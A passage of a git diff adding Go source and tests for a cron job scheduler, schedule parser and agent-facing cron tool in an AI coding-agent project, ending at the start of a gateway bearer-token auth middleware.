+		LastRun: time.Now().Add(-2 * time.Hour),
+	}
+	if s.isDue(job, time.Now()) {
+		t.Error("expected not due — no NextRun set, one-shot already completed")
+	}
+
+	// A job with NextRun in the past — should be due
+	job2 := CronJob{
+		Enabled: true,
+		LastRun: time.Now().Add(-2 * time.Hour),
+		NextRun: time.Now().Add(-30 * time.Minute),
+	}
+	if !s.isDue(job2, time.Now()) {
+		t.Error("expected due — NextRun is in the past")
+	}
+}
+
+func TestIsDueOneShotFirstRun(t *testing.T) {
+	s := &Scheduler{}
+	job := CronJob{
+		Enabled: true,
+		OneShot: true,
+		LastRun: time.Time{}, // never run
+	}
+	if !s.isDue(job, time.Now()) {
+		t.Error("expected due — one-shot never run")
+	}
+}
+
+func TestIsDuePeriodicJob(t *testing.T) {
+	s := &Scheduler{}
+	next := time.Now().Add(-5 * time.Minute) // 5 min ago
+	job := CronJob{
+		Enabled:  true,
+		Schedule: "@hourly",
+		LastRun:  time.Now().Add(-2 * time.Hour),
+		NextRun:  next,
+	}
+	if !s.isDue(job, time.Now()) {
+		t.Error("expected due — periodic job past NextRun")
+	}
+}
+
+func TestIsDueDisabled(t *testing.T) {
+	s := &Scheduler{}
+	// isDue only checks timing; the checkAndRun loop skips disabled jobs.
+	// But isDue itself should still return true for timing.
+	job := CronJob{
+		Enabled: false,
+		LastRun: time.Time{}, // Never run
+	}
+	// isDue doesn't check Enabled flag — that's checked in checkAndRun.
+	if !s.isDue(job, time.Now()) {
+		t.Error("isDue should return true regardless of Enabled flag")
+	}
+}
+
+func TestSchedulerCheckAndRunSkipsDisabledAndRunning(t *testing.T) {
+	tmp := t.TempDir()
+	store := NewFileCronStore(filepath.Join(tmp, "cron.json"))
+
+	// Create disabled job
+	store.Create(CronJob{ID: "disabled", Name: "Disabled", Enabled: false})
+
+	// Create already running job
+	runningJob := CronJob{ID: "running", Name: "Running", Enabled: true, LastStatus: "running"}
+	store.Create(runningJob)
+
+	sched := NewScheduler(store, nil, time.Second)
+	// Should not panic even with nil manager (neither job should execute)
+	sched.checkAndRun()
+
+	// Verify no changes
+	disabled, _ := store.Get("disabled")
+	if disabled.LastStatus != "" {
+		t.Errorf("disabled job status = %q, want empty", disabled.LastStatus)
+	}
+	running, _ := store.Get("running")
+	if running.LastStatus != "running" {
+		t.Errorf("running job status = %q, want 'running'", running.LastStatus)
+	}
+}
+
+func TestCronJobStructFields(t *testing.T) {
+	now := time.Now()
+	job := CronJob{
+		ID:         "j1",
+		Name:       "Test Job",
+		Prompt:     "Run tests",
+		Schedule:   "0 9 * * *",
+		Mode:       "agent",
+		WorkDir:    "/home/user/project",
+		Enabled:    true,
+		CreatedAt:  now,
+		LastRun:    now,
+		NextRun:    now.Add(time.Hour),
+		RunCount:   5,
+		LastStatus: "success",
+		LastError:  "",
+	}
+
+	if job.ID != "j1" {
+		t.Errorf("ID = %q, want 'j1'", job.ID)
+	}
+	if job.RunCount != 5 {
+		t.Errorf("RunCount = %d, want 5", job.RunCount)
+	}
+}
diff --git a/internal/cron/schedule.go b/internal/cron/schedule.go
new file mode 100644
index 0000000..ecdd779
--- /dev/null
+++ b/internal/cron/schedule.go
@@ -0,0 +1,136 @@
+package cron
+
+import (
+	"fmt"
+	"strconv"
+	"strings"
+	"time"
+)
+
+// ParseSchedule parses a human-readable schedule string into a next-run time.
+// Supported formats:
+//
+//	""           → one-shot (no next run)
+//	"@once"      → one-shot (same as empty)
+//	"@every 30m" → every 30 minutes
+//	"@every 2h"  → every 2 hours
+//	"@every 1d"  → every 1 day
+//	"@hourly"    → every 1 hour
+//	"@daily"     → every 24 hours (midnight)
+//	"@weekly"    → every 7 days
+//	"@monthly"   → 1st of next month
+func ParseSchedule(schedule string, from time.Time) (next time.Time, isOneShot bool, err error) {
+	schedule = strings.TrimSpace(schedule)
+
+	// Empty or @once → one-shot
+	if schedule == "" || schedule == "@once" {
+		return time.Time{}, true, nil
+	}
+
+	// @every Xm / Xh / Xd
+	if strings.HasPrefix(schedule, "@every ") {
+		dur, err := parseDuration(strings.TrimPrefix(schedule, "@every "))
+		if err != nil {
+			return time.Time{}, false, fmt.Errorf("invalid @every duration: %w", err)
+		}
+		return from.Add(dur), false, nil
+	}
+
+	// Named schedules
+	switch strings.ToLower(schedule) {
+	case "@hourly":
+		return from.Add(time.Hour), false, nil
+	case "@daily":
+		// Next midnight
+		y, m, d := from.Date()
+		next = time.Date(y, m, d+1, 0, 0, 0, 0, from.Location())
+		return next, false, nil
+	case "@weekly":
+		// Next Monday midnight
+		y, m, d := from.Date()
+		daysUntilMon := (8 - int(from.Weekday())) % 7
+		if daysUntilMon == 0 {
+			daysUntilMon = 7
+		}
+		next = time.Date(y, m, d+daysUntilMon, 0, 0, 0, 0, from.Location())
+		return next, false, nil
+	case "@monthly":
+		// Next 1st of month
+		y, m, _ := from.Date()
+		next = time.Date(y, m+1, 1, 0, 0, 0, 0, from.Location())
+		return next, false, nil
+	}
+
+	// Try standard 5-field cron: min hour day month weekday
+	// Simplified: only support "*/N" in one field for now
+	parts := strings.Fields(schedule)
+	if len(parts) == 5 {
+		return parseCronExpr(parts, from)
+	}
+
+	return time.Time{}, false, fmt.Errorf("unsupported schedule format: %q (use @every Xm, @hourly, @daily, @weekly, @monthly, or 5-field cron)", schedule)
+}
+
+// parseDuration parses "30m", "2h", "1d" into time.Duration.
+func parseDuration(s string) (time.Duration, error) {
+	if strings.HasSuffix(s, "d") {
+		n, err := strconv.Atoi(strings.TrimSuffix(s, "d"))
+		if err != nil {
+			return 0, err
+		}
+		return time.Duration(n) * 24 * time.Hour, nil
+	}
+	return time.ParseDuration(s)
+}
+
+// parseCronExpr handles basic 5-field cron expressions.
+// Supports: exact values, */N (every N), and * (any).
+func parseCronExpr(fields []string, from time.Time) (time.Time, bool, error) {
+	minField := fields[0]
+	hourField := fields[1]
+
+	// Parse minute
+	minStep := 0
+	if strings.HasPrefix(minField, "*/") {
+		n, err := strconv.Atoi(strings.TrimPrefix(minField, "*/"))
+		if err != nil {
+			return time.Time{}, false, fmt.Errorf("invalid cron minute: %s", minField)
+		}
+		minStep = n
+	} else if minField != "*" {
+		n, err := strconv.Atoi(minField)
+		if err != nil {
+			return time.Time{}, false, fmt.Errorf("invalid cron minute: %s", minField)
+		}
+		// Exact minute: next occurrence today or tomorrow
+		next := time.Date(from.Year(), from.Month(), from.Day(), from.Hour(), n, 0, 0, from.Location())
+		if hourField != "*" {
+			h, err := strconv.Atoi(hourField)
+			if err == nil {
+				next = time.Date(from.Year(), from.Month(), from.Day(), h, n, 0, 0, from.Location())
+			}
+		}
+		if !next.After(from) {
+			next = next.Add(24 * time.Hour)
+		}
+		return next, false, nil
+	}
+
+	// */N minute step
+	if minStep > 0 {
+		currentMin := from.Minute()
+		nextMin := ((currentMin / minStep) + 1) * minStep
+		next := from.Truncate(time.Minute).Add(time.Duration(nextMin-currentMin) * time.Minute)
+		if !next.After(from) {
+			next = next.Add(time.Duration(minStep) * time.Minute)
+		}
+		return next, false, nil
+	}
+
+	// Wildcard: default to hourly
+	next := from.Truncate(time.Minute).Add(time.Minute)
+	if !next.After(from) {
+		next = next.Add(time.Minute)
+	}
+	return next, false, nil
+}
diff --git a/internal/cron/schedule_test.go b/internal/cron/schedule_test.go
new file mode 100644
index 0000000..5b07fb6
--- /dev/null
+++ b/internal/cron/schedule_test.go
@@ -0,0 +1,99 @@
+package cron
+
+import (
+	"testing"
+	"time"
+)
+
+func TestParseScheduleEmpty(t *testing.T) {
+	next, oneShot, err := ParseSchedule("", time.Now())
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !oneShot {
+		t.Error("expected one-shot for empty schedule")
+	}
+	if !next.IsZero() {
+		t.Error("expected zero next run for one-shot")
+	}
+}
+
+func TestParseScheduleOnce(t *testing.T) {
+	next, oneShot, err := ParseSchedule("@once", time.Now())
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !oneShot {
+		t.Error("expected one-shot for @once")
+	}
+	if !next.IsZero() {
+		t.Error("expected zero next run for @once")
+	}
+}
+
+func TestParseScheduleEveryDuration(t *testing.T) {
+	now := time.Now()
+
+	tests := []struct {
+		schedule string
+		wantDur  time.Duration
+	}{
+		{"@every 30m", 30 * time.Minute},
+		{"@every 2h", 2 * time.Hour},
+		{"@every 1d", 24 * time.Hour},
+	}
+
+	for _, tt := range tests {
+		next, oneShot, err := ParseSchedule(tt.schedule, now)
+		if err != nil {
+			t.Errorf("ParseSchedule(%q): %v", tt.schedule, err)
+			continue
+		}
+		if oneShot {
+			t.Errorf("ParseSchedule(%q): unexpected one-shot", tt.schedule)
+		}
+		got := next.Sub(now).Round(time.Minute)
+		if got != tt.wantDur {
+			t.Errorf("ParseSchedule(%q): got %v, want %v", tt.schedule, got, tt.wantDur)
+		}
+	}
+}
+
+func TestParseScheduleNamed(t *testing.T) {
+	now := time.Date(2026, 5, 29, 15, 30, 0, 0, time.UTC)
+
+	tests := []struct {
+		schedule string
+		wantNext time.Time
+	}{
+		{"@hourly", time.Date(2026, 5, 29, 16, 30, 0, 0, time.UTC)},
+		{"@daily", time.Date(2026, 5, 30, 0, 0, 0, 0, time.UTC)},
+		{"@monthly", time.Date(2026, 6, 1, 0, 0, 0, 0, time.UTC)},
+	}
+
+	for _, tt := range tests {
+		next, oneShot, err := ParseSchedule(tt.schedule, now)
+		if err != nil {
+			t.Errorf("ParseSchedule(%q): %v", tt.schedule, err)
+			continue
+		}
+		if oneShot {
+			t.Errorf("ParseSchedule(%q): unexpected one-shot", tt.schedule)
+		}
+		if !next.Equal(tt.wantNext) {
+			t.Errorf("ParseSchedule(%q): got %v, want %v", tt.schedule, next, tt.wantNext)
+		}
+	}
+}
+
+func TestParseScheduleInvalid(t *testing.T) {
+	_, _, err := ParseSchedule("invalid", time.Now())
+	if err == nil {
+		t.Error("expected error for invalid schedule")
+	}
+
+	_, _, err = ParseSchedule("@every xyz", time.Now())
+	if err == nil {
+		t.Error("expected error for invalid @every duration")
+	}
+}
diff --git a/internal/cron/scheduler.go b/internal/cron/scheduler.go
new file mode 100644
index 0000000..bf3a4fa
--- /dev/null
+++ b/internal/cron/scheduler.go
@@ -0,0 +1,244 @@
+package cron
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"log"
+	"net/http"
+	"sync"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+)
+
+// Scheduler checks for due cron jobs and executes them via sub-agents.
+type Scheduler struct {
+	store    CronStore
+	manager  *agent.AgentManager
+	interval time.Duration
+	quit     chan struct{}
+	running  bool
+	mu       sync.Mutex
+}
+
+var a2aHTTPClient = &http.Client{Timeout: 30 * time.Second}
+
+const maxA2AResponseBytes = 1 << 20
+
+// NewScheduler creates a new cron scheduler.
+func NewScheduler(store CronStore, manager *agent.AgentManager, interval time.Duration) *Scheduler {
+	if interval <= 0 {
+		interval = 30 * time.Second
+	}
+	return &Scheduler{
+		store:    store,
+		manager:  manager,
+		interval: interval,
+		quit:     make(chan struct{}),
+	}
+}
+
+// Start begins the scheduler loop.
+func (s *Scheduler) Start() {
+	s.mu.Lock()
+	if s.running {
+		s.mu.Unlock()
+		return
+	}
+	s.running = true
+	s.quit = make(chan struct{})
+	s.mu.Unlock()
+
+	go s.loop()
+}
+
+// Stop stops the scheduler.
+func (s *Scheduler) Stop() {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	if !s.running {
+		return
+	}
+	s.running = false
+	close(s.quit)
+}
+
+// IsRunning returns whether the scheduler is running.
+func (s *Scheduler) IsRunning() bool {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	return s.running
+}
+
+func (s *Scheduler) loop() {
+	ticker := time.NewTicker(s.interval)
+	defer ticker.Stop()
+
+	// Check immediately on start
+	s.checkAndRun()
+
+	for {
+		select {
+		case <-s.quit:
+			return
+		case <-ticker.C:
+			s.checkAndRun()
+		}
+	}
+}
+
+// checkAndRun checks all enabled jobs and runs any that are due.
+func (s *Scheduler) checkAndRun() {
+	jobs, err := s.store.List()
+	if err != nil {
+		log.Printf("[cron] failed to list jobs: %v", err)
+		return
+	}
+
+	now := time.Now()
+	for _, job := range jobs {
+		if !job.Enabled {
+			continue
+		}
+		if job.LastStatus == "running" {
+			continue // Don't start a job that's already running
+		}
+		if s.isDue(job, now) {
+			go s.executeJob(job)
+		}
+	}
+}
+
+// isDue checks if a job should run now.
+func (s *Scheduler) isDue(job CronJob, now time.Time) bool {
+	// If never run, run now
+	if job.LastRun.IsZero() {
+		return true
+	}
+	// If NextRun is set and has passed
+	if !job.NextRun.IsZero() && now.After(job.NextRun) {
+		return true
+	}
+	return false
+}
+
+// executeJob runs a cron job by spawning a sub-agent or sending to A2A server.
+func (s *Scheduler) executeJob(job CronJob) {
+	// Mark as running
+	startedAt := time.Now()
+	s.updateJob(job.ID, func(current *CronJob) {
+		current.LastStatus = "running"
+		current.LastRun = startedAt
+	})
+
+	var lastErr error
+
+	// A2A target mode: send task to remote A2A server
+	if job.A2ATarget != "" {
+		lastErr = s.executeA2AJob(job)
+	} else {
+		// Local agent mode
+		a, err := s.manager.Create(agent.AgentOptions{
+			Mode:    job.Mode,
+			WorkDir: job.WorkDir,
+		})
+		if err != nil {
+			s.updateJob(job.ID, func(current *CronJob) {
+				current.LastStatus = "failed"
+				current.LastError = fmt.Sprintf("create agent: %v", err)
+			})
+			return
+		}
+
+		ch := a.Run(context.Background(), job.Prompt)
+		for event := range ch {
+			if event.Error != nil {
+				lastErr = event.Error
+			}
+		}
+		s.manager.Destroy(a.ID())
+	}
+
+	s.updateJob(job.ID, func(current *CronJob) {
+		current.RunCount++
+		if lastErr != nil {
+			current.LastStatus = "failed"
+			current.LastError = lastErr.Error()
+		} else {
+			current.LastStatus = "success"
+			current.LastError = ""
+		}
+
+		// Compute next run from the latest stored schedule.
+		next, isOneShot, err := ParseSchedule(current.Schedule, time.Now())
+		if err != nil {
+			isOneShot = true
+		}
+		if isOneShot || current.OneShot {
+			current.Enabled = false
+			current.NextRun = time.Time{}
+		} else {
+			current.NextRun = next
+		}
+	})
+}
+
+func (s *Scheduler) updateJob(id string, update func(*CronJob)) {
+	current, err := s.store.Get(id)
+	if err != nil {
+		return
+	}
+	update(current)
+	_ = s.store.Update(*current)
+}
+
+// executeA2AJob sends a task to a remote A2A server.
+func (s *Scheduler) executeA2AJob(job CronJob) error {
+	payload := map[string]any{
+		"jsonrpc": "2.0",
+		"method":  "message/send",
+		"params": map[string]any{
+			"message": map[string]any{
+				"role":  "user",
+				"parts": []map[string]string{{"type": "text", "text": job.Prompt}},
+			},
+		},
+		"id": 1,
+	}
+
+	body, _ := json.Marshal(payload)
+	req, err := http.NewRequest("POST", job.A2ATarget+"/a2a", bytes.NewReader(body))
+	if err != nil {
+		return fmt.Errorf("create request: %w", err)
+	}
+	req.Header.Set("Content-Type", "application/json")
+	if job.A2AToken != "" {
+		req.Header.Set("Authorization", "Bearer "+job.A2AToken)
+	}
+
+	resp, err := a2aHTTPClient.Do(req)
+	if err != nil {
+		return fmt.Errorf("a2a request: %w", err)
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode != http.StatusOK {
+		return fmt.Errorf("a2a request: status %d", resp.StatusCode)
+	}
+
+	var result struct {
+		Error *struct {
+			Message string `json:"message"`
+		} `json:"error"`
+	}
+	if err := json.NewDecoder(io.LimitReader(resp.Body, maxA2AResponseBytes)).Decode(&result); err != nil {
+		return fmt.Errorf("decode response: %w", err)
+	}
+	if result.Error != nil {
+		return fmt.Errorf("a2a error: %s", result.Error.Message)
+	}
+	return nil
+}
diff --git a/internal/cron/tool.go b/internal/cron/tool.go
new file mode 100644
index 0000000..77a3aa5
--- /dev/null
+++ b/internal/cron/tool.go
@@ -0,0 +1,266 @@
+package cron
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"strings"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/tools"
+	"github.com/startvibecoding/vibecoding/internal/util"
+)
+
+// CronTool provides cron job management for the agent.
+type CronTool struct {
+	store     CronStore
+	scheduler *Scheduler
+}
+
+// NewCronTool creates a new cron management tool.
+func NewCronTool(store CronStore, scheduler *Scheduler) *CronTool {
+	return &CronTool{store: store, scheduler: scheduler}
+}
+
+func (t *CronTool) Name() string {
+	return "cron"
+}
+
+func (t *CronTool) Description() string {
+	return "Manage scheduled tasks (cron jobs). Create one-time or periodic background tasks that run via sub-agents."
+}
+
+func (t *CronTool) PromptSnippet() string {
+	return "Manage scheduled background tasks (one-time or periodic)"
+}
+
+func (t *CronTool) PromptGuidelines() []string {
+	return []string{
+		"The `cron` tool manages scheduled background tasks that run via sub-agents.",
+		"Use `cron(action=\"list\")` to see existing tasks.",
+		"Use `cron(action=\"create\", name=\"...\", prompt=\"...\", schedule=\"@daily\")` for periodic tasks.",
+		"Use `cron(action=\"create\", name=\"...\", prompt=\"...\", oneshot=true)` for one-time tasks.",
+		"Schedule formats: `@daily`, `@weekly`, `@monthly`, `@hourly`, `@every 30m`, `@every 2h`, or empty for one-shot.",
+		"Use `cron(action=\"run\", id=\"...\")` to trigger a task immediately.",
+	}
+}
+
+func (t *CronTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{
+		"type": "object",
+		"properties": {
+			"action": {
+				"type": "string",
+				"description": "Action: list, create, enable, disable, remove, run",
+				"enum": ["list", "create", "enable", "disable", "remove", "run"]
+			},
+			"id": {
+				"type": "string",
+				"description": "Job ID (required for enable, disable, remove, run)"
+			},
+			"name": {
+				"type": "string",
+				"description": "Short task name (required for create)"
+			},
+			"prompt": {
+				"type": "string",
+				"description": "Task prompt for the sub-agent (required for create)"
+			},
+			"schedule": {
+				"type": "string",
+				"description": "Schedule: @daily, @weekly, @monthly, @hourly, @every 30m, @every 2h, or empty/omit for one-shot"
+			},
+			"oneshot": {
+				"type": "boolean",
+				"description": "If true, run once then auto-disable (default: false). Same as omitting schedule."
+			},
+			"mode": {
+				"type": "string",
+				"description": "Agent mode for the task: agent, yolo (default: yolo)",
+				"enum": ["agent", "yolo"]
+			}
+		},
+		"required": ["action"]
+	}`)
+}
+
+func (t *CronTool) Execute(ctx context.Context, params map[string]any) (tools.ToolResult, error) {
+	action, _ := params["action"].(string)
+
+	switch action {
+	case "list":
+		return t.executeList()
+	case "create":
+		name, _ := params["name"].(string)
+		prompt, _ := params["prompt"].(string)
+		schedule, _ := params["schedule"].(string)
+		oneShot, _ := params["oneshot"].(bool)
+		mode, _ := params["mode"].(string)
+		return t.executeCreate(name, prompt, schedule, oneShot, mode)
+	case "enable":
+		id, _ := params["id"].(string)
+		return t.executeSetEnabled(id, true)
+	case "disable":
+		id, _ := params["id"].(string)
+		return t.executeSetEnabled(id, false)
+	case "remove":
+		id, _ := params["id"].(string)
+		return t.executeRemove(id)
+	case "run":
+		id, _ := params["id"].(string)
+		return t.executeRun(id)
+	default:
+		return tools.ToolResult{}, fmt.Errorf("unknown action: %s (use: list, create, enable, disable, remove, run)", action)
+	}
+}
+
+func (t *CronTool) executeList() (tools.ToolResult, error) {
+	jobs, err := t.store.List()
+	if err != nil {
+		return tools.ToolResult{}, fmt.Errorf("list cron jobs: %w", err)
+	}
+	if len(jobs) == 0 {
+		return tools.NewTextToolResult("No cron jobs configured."), nil
+	}
+
+	var sb strings.Builder
+	sb.WriteString(fmt.Sprintf("Cron jobs (%d):\n\n", len(jobs)))
+	for _, j := range jobs {
+		status := "✅ enabled"
+		if !j.Enabled {
+			status = "⏸ disabled"
+		}
+		if j.LastStatus == "failed" {
+			status = "❌ failed"
+		}
+		if j.LastStatus == "running" {
+			status = "🔄 running"
+		}
+		sb.WriteString(fmt.Sprintf("- [%s] %s\n  Status: %s | Mode: %s | Schedule: %s | Runs: %d\n  Prompt: %s\n",
+			j.ID, j.Name, status, j.Mode, scheduleStr(j.Schedule, j.OneShot), j.RunCount, truncateStr(j.Prompt, 80)))
+		if !j.LastRun.IsZero() {
+			sb.WriteString(fmt.Sprintf("  Last run: %s\n", j.LastRun.Format(time.RFC3339)))
+		}
+		if j.LastError != "" {
+			sb.WriteString(fmt.Sprintf("  Error: %s\n", j.LastError))
+		}
+		sb.WriteString("\n")
+	}
+	return tools.NewTextToolResult(sb.String()), nil
+}
+
+func (t *CronTool) executeCreate(name, prompt, schedule string, oneShot bool, mode string) (tools.ToolResult, error) {
+	if name == "" {
+		return tools.ToolResult{}, fmt.Errorf("name is required for create")
+	}
+	if prompt == "" {
+		return tools.ToolResult{}, fmt.Errorf("prompt is required for create")
+	}
+	if mode == "" {
+		mode = "yolo"
+	}
+
+	// Determine if one-shot: explicit oneshot=true or empty schedule (and not a periodic schedule)
+	isOneShot := oneShot
+	if !isOneShot && schedule == "" {
+		isOneShot = true // Default: no schedule = one-shot
+	}
+
+	// Compute NextRun for periodic tasks
+	var nextRun time.Time
+	if !isOneShot && schedule != "" {
+		next, _, err := ParseSchedule(schedule, time.Now())
+		if err != nil {
+			return tools.ToolResult{}, fmt.Errorf("invalid schedule: %w", err)
+		}
+		nextRun = next
+	}
+
+	job, err := t.store.Create(CronJob{
+		Name:     name,
+		Prompt:   prompt,
+		Schedule: schedule,
+		OneShot:  isOneShot,
+		Enabled:  true,
+		Mode:     mode,
+		NextRun:  nextRun,
+	})
+	if err != nil {
+		return tools.ToolResult{}, fmt.Errorf("create cron job: %w", err)
+	}
+
+	kind := "periodic"
+	if isOneShot {
+		kind = "one-shot"
+	}
+	nextInfo := ""
+	if !nextRun.IsZero() {
+		nextInfo = fmt.Sprintf("\n  Next run: %s", nextRun.Format(time.RFC3339))
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("✅ Cron job created (%s):\n  ID: %s\n  Name: %s\n  Schedule: %s\n  Mode: %s%s\n  Prompt: %s",
+		kind, job.ID, job.Name, scheduleStr(job.Schedule, isOneShot), job.Mode, nextInfo, truncateStr(job.Prompt, 100))), nil
+}
+
+func scheduleStr(schedule string, oneShot bool) string {
+	if oneShot {
+		return "(one-shot)"
+	}
+	if schedule == "" {
+		return "(one-shot)"
+	}
+	return schedule
+}
+
+func (t *CronTool) executeSetEnabled(id string, enabled bool) (tools.ToolResult, error) {
+	if id == "" {
+		return tools.ToolResult{}, fmt.Errorf("id is required")
+	}
+	job, err := t.store.Get(id)
+	if err != nil {
+		return tools.ToolResult{}, err
+	}
+	job.Enabled = enabled
+	if err := t.store.Update(*job); err != nil {
+		return tools.ToolResult{}, fmt.Errorf("update cron job: %w", err)
+	}
+	action := "enabled"
+	if !enabled {
+		action = "disabled"
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("✅ Cron job %s %s: %s", job.ID, action, job.Name)), nil
+}
+
+func (t *CronTool) executeRemove(id string) (tools.ToolResult, error) {
+	if id == "" {
+		return tools.ToolResult{}, fmt.Errorf("id is required")
+	}
+	job, err := t.store.Get(id)
+	if err != nil {
+		return tools.ToolResult{}, err
+	}
+	name := job.Name
+	if err := t.store.Delete(id); err != nil {
+		return tools.ToolResult{}, fmt.Errorf("delete cron job: %w", err)
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("🗑 Cron job removed: %s (%s)", id, name)), nil
+}
+
+func (t *CronTool) executeRun(id string) (tools.ToolResult, error) {
+	if id == "" {
+		return tools.ToolResult{}, fmt.Errorf("id is required")
+	}
+	job, err := t.store.Get(id)
+	if err != nil {
+		return tools.ToolResult{}, err
+	}
+	// Trigger by resetting LastRun so scheduler picks it up on next tick
+	job.LastRun = time.Time{}
+	if err := t.store.Update(*job); err != nil {
+		return tools.ToolResult{}, fmt.Errorf("update cron job: %w", err)
+	}
+	return tools.NewTextToolResult(fmt.Sprintf("▶ Cron job %s triggered: %s (will run on next scheduler tick)", job.ID, job.Name)), nil
+}
+
+func truncateStr(s string, maxLen int) string {
+	return util.TruncateWithSuffix(s, maxLen, "...")
+}
diff --git a/internal/cron/tool_test.go b/internal/cron/tool_test.go
new file mode 100644
index 0000000..cd51039
--- /dev/null
+++ b/internal/cron/tool_test.go
@@ -0,0 +1,201 @@
+package cron
+
+import (
+	"context"
+	"testing"
+)
+
+func TestCronToolCreateOneShot(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	result, err := tool.Execute(context.Background(), map[string]any{
+		"action":  "create",
+		"name":    "test-task",
+		"prompt":  "do something",
+		"oneshot": true,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if result.Text == "" {
+		t.Error("expected non-empty result")
+	}
+
+	jobs, _ := store.List()
+	if len(jobs) != 1 {
+		t.Fatalf("expected 1 job, got %d", len(jobs))
+	}
+	if !jobs[0].OneShot {
+		t.Error("expected oneshot=true")
+	}
+	if jobs[0].Schedule != "" {
+		t.Errorf("expected empty schedule, got %q", jobs[0].Schedule)
+	}
+}
+
+func TestCronToolCreatePeriodic(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	result, err := tool.Execute(context.Background(), map[string]any{
+		"action":   "create",
+		"name":     "daily-check",
+		"prompt":   "check status",
+		"schedule": "@daily",
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if result.Text == "" {
+		t.Error("expected non-empty result")
+	}
+
+	jobs, _ := store.List()
+	if len(jobs) != 1 {
+		t.Fatalf("expected 1 job, got %d", len(jobs))
+	}
+	if jobs[0].OneShot {
+		t.Error("expected oneshot=false for periodic")
+	}
+	if jobs[0].Schedule != "@daily" {
+		t.Errorf("expected schedule @daily, got %q", jobs[0].Schedule)
+	}
+	if jobs[0].NextRun.IsZero() {
+		t.Error("expected non-zero NextRun for periodic job")
+	}
+}
+
+func TestCronToolCreateDefaultOneShot(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"action": "create",
+		"name":   "default-task",
+		"prompt": "do stuff",
+		// no schedule, no oneshot → should default to one-shot
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	jobs, _ := store.List()
+	if !jobs[0].OneShot {
+		t.Error("expected default to be one-shot when no schedule")
+	}
+}
+
+func TestCronToolList(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	// Empty list
+	result, _ := tool.Execute(context.Background(), map[string]any{"action": "list"})
+	if result.Text != "No cron jobs configured." {
+		t.Errorf("unexpected empty list: %s", result.Text)
+	}
+
+	// Add a job and list
+	store.Create(CronJob{Name: "test", Prompt: "test", Enabled: true})
+	result, _ = tool.Execute(context.Background(), map[string]any{"action": "list"})
+	if result.Text == "No cron jobs configured." {
+		t.Error("expected non-empty list")
+	}
+}
+
+func TestCronToolEnableDisable(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	job, _ := store.Create(CronJob{Name: "test", Prompt: "test", Enabled: true})
+
+	// Disable
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"action": "disable",
+		"id":     job.ID,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	j, _ := store.Get(job.ID)
+	if j.Enabled {
+		t.Error("expected disabled")
+	}
+
+	// Enable
+	_, err = tool.Execute(context.Background(), map[string]any{
+		"action": "enable",
+		"id":     job.ID,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	j, _ = store.Get(job.ID)
+	if !j.Enabled {
+		t.Error("expected enabled")
+	}
+}
+
+func TestCronToolRemove(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	job, _ := store.Create(CronJob{Name: "test", Prompt: "test", Enabled: true})
+
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"action": "remove",
+		"id":     job.ID,
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	jobs, _ := store.List()
+	if len(jobs) != 0 {
+		t.Errorf("expected 0 jobs after remove, got %d", len(jobs))
+	}
+}
+
+func TestCronToolMissingParams(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	// Create without name
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"action": "create",
+		"prompt": "test",
+	})
+	if err == nil {
+		t.Error("expected error for missing name")
+	}
+
+	// Create without prompt
+	_, err = tool.Execute(context.Background(), map[string]any{
+		"action": "create",
+		"name":   "test",
+	})
+	if err == nil {
+		t.Error("expected error for missing prompt")
+	}
+
+	// Enable without id
+	_, err = tool.Execute(context.Background(), map[string]any{
+		"action": "enable",
+	})
+	if err == nil {
+		t.Error("expected error for missing id")
+	}
+}
+
+func TestCronToolUnknownAction(t *testing.T) {
+	store := NewFileCronStore(t.TempDir() + "/cron.json")
+	tool := NewCronTool(store, nil)
+
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"action": "invalid",
+	})
+	if err == nil {
+		t.Error("expected error for unknown action")
+	}
+}
diff --git a/internal/gateway/auth.go b/internal/gateway/auth.go
new file mode 100644
index 0000000..c164b5a
--- /dev/null
+++ b/internal/gateway/auth.go
@@ -0,0 +1,97 @@
+package gateway
+
+import (
+	"net/http"
+	"strings"
+)
+
+// AuthMiddleware returns an HTTP middleware that validates Bearer tokens.
+// If auth is disabled, the handler is called directly.
+func AuthMiddleware(cfg AuthConfig, next http.Handler) http.Handler {
+	if !cfg.Enabled || len(cfg.Tokens) == 0 {
+		return next
+	}
+	tokenSet := make(map[string]struct{}, len(cfg.Tokens))
+	for _, t := range cfg.Tokens {
+		tokenSet[t] = struct{}{}
+	}
+	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		token := extractBearerToken(r)
+		if token == "" {
